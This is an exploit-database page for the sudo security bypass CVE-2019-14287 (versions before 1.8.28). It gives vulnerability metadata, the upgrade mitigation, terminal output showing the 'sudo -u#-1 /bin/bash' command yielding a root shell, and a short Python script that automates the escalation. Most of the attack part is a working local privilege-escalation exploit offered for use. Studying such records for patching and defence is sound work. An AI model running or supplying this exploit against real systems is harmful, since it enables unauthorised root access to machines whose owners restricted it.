header-logo
Suggest Exploit
vendor:
sudo
by:
Joe Vennix
8.8
CVSS
HIGH
Privilege Escalation
264
CWE
Product Name: sudo
Affected Version From: Sudo <1.8.28
Affected Version To: Sudo <1.8.27
Patch Exists: YES
Related CWE: CVE-2019-14287
CPE: a:sudo:sudo:1.8.27
Metasploit: https://www.rapid7.com/db/vulnerabilities/oracle-solaris-cve-2019-14287/https://www.rapid7.com/db/vulnerabilities/amazon-linux-ami-2-cve-2019-14287/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp3-cve-2019-14287/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp5-cve-2019-14287/https://www.rapid7.com/db/vulnerabilities/redhat-openshift-cve-2019-14287/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp8-cve-2019-14287/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2019-14287/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp2-cve-2019-14287/https://www.rapid7.com/db/vulnerabilities/redhat_linux-cve-2019-14287/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2019-14287/https://www.rapid7.com/db/vulnerabilities/debian-cve-2019-14287/https://www.rapid7.com/db/vulnerabilities/oracle_linux-cve-2019-14287/https://www.rapid7.com/db/vulnerabilities/suse-cve-2019-14287/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2019-14287/https://www.rapid7.com/db/vulnerabilities/amazon_linux-cve-2019-14287/
Other Scripts: N/A
Platforms Tested: Linux
2019

sudo 1.8.27 – Security Bypass

Sudo doesn't check for the existence of the specified user id and executes the with arbitrary user id with the sudo priv -u#-1 returns as 0 which is root's id and /bin/bash is executed with root permission.

Mitigation:

Upgrade to sudo 1.8.28 or later
Source

Exploit-DB raw data:

# Exploit Title : sudo 1.8.27 - Security Bypass
# Date : 2019-10-15
# Original Author: Joe Vennix
# Exploit Author : Mohin Paramasivam (Shad0wQu35t)
# Version : Sudo <1.8.28
# Tested on Linux
# Credit : Joe Vennix from Apple Information Security found and analyzed the bug
# Fix : The bug is fixed in sudo 1.8.28
# CVE : 2019-14287

'''Check for the user sudo permissions

sudo -l 

User hacker may run the following commands on kali:
    (ALL, !root) /bin/bash


So user hacker can't run /bin/bash as root (!root)


User hacker sudo privilege in /etc/sudoers

# User privilege specification
root    ALL=(ALL:ALL) ALL

hacker ALL=(ALL,!root) /bin/bash


With ALL specified, user hacker can run the binary /bin/bash as any user

EXPLOIT: 

sudo -u#-1 /bin/bash

Example : 

hacker@kali:~$ sudo -u#-1 /bin/bash
root@kali:/home/hacker# id
uid=0(root) gid=1000(hacker) groups=1000(hacker)
root@kali:/home/hacker#

Description :
Sudo doesn't check for the existence of the specified user id and executes the with arbitrary user id with the sudo priv
-u#-1 returns as 0 which is root's id

and /bin/bash is executed with root permission
Proof of Concept Code :

How to use :
python3 sudo_exploit.py

'''


#!/usr/bin/python3

import os

#Get current username

username = input("Enter current username :")


#check which binary the user can run with sudo

os.system("sudo -l > priv")


os.system("cat priv | grep 'ALL' | cut -d ')' -f 2 > binary")

binary_file = open("binary")

binary= binary_file.read()

#execute sudo exploit

print("Lets hope it works")

os.system("sudo -u#-1 "+ binary)

Navigation

Suggest Exploit

Services By CQR